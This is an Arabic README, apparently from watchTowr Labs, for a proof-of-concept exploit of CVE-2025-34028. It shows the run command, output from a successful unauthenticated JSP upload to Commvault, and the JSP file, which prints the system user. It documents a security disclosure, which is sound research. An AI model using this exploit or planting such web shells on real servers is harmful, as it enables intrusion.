
استغلال إثبات المفهوم لـ CVE-2025-34028، يُظهر تنفيذًا عن بُعد للكود قبل المصادقة على واجهات الويب الخاصة بـ Commvault عبر رفع JSP خبيث.
إثبات مفهوم لتنفيذ تعليمات برمجية عن بُعد بدون مصادقة مسبقة في Commvault
اطلع على منشور مدونتنا للحصول على التفاصيل التقنية
python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchtowr-vs-commvault-rce-CVE-2025-34028.py
(*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-34028]
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$
هذا البرنامج النصي هو إثبات مفهوم لـ CVE-2025-34028، لواجهات الويب الخاصة بـ Commvault. من خلال رفع ملف مضغوط (zip) يحتوي على ملف .jsp لتنفيذ التعليمات البرمجية، يتم رفع الملف المضغوط إلى دليل عام ويتم تفصيل المستخدم النظامي داخل الاستجابة. تم توضيح المزيد من التفاصيل في [منشور مدونتنا] (https://labs.watchtowr.com/).
يستخدم البرنامج النصي للإثبات ملفًا مضغوطًا ثابتًا يحتوي على الملفات التالية:
محتويات Shell.jsp:
<%@ page import="java.util.*" %>
<html>
<body>
<h3>System Information</h3>
<p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>
لمزيد من التفاصيل، راجع تنبيه Commvault
لأحدث الأبحاث الأمنية، تابع فريق watchTowr Labs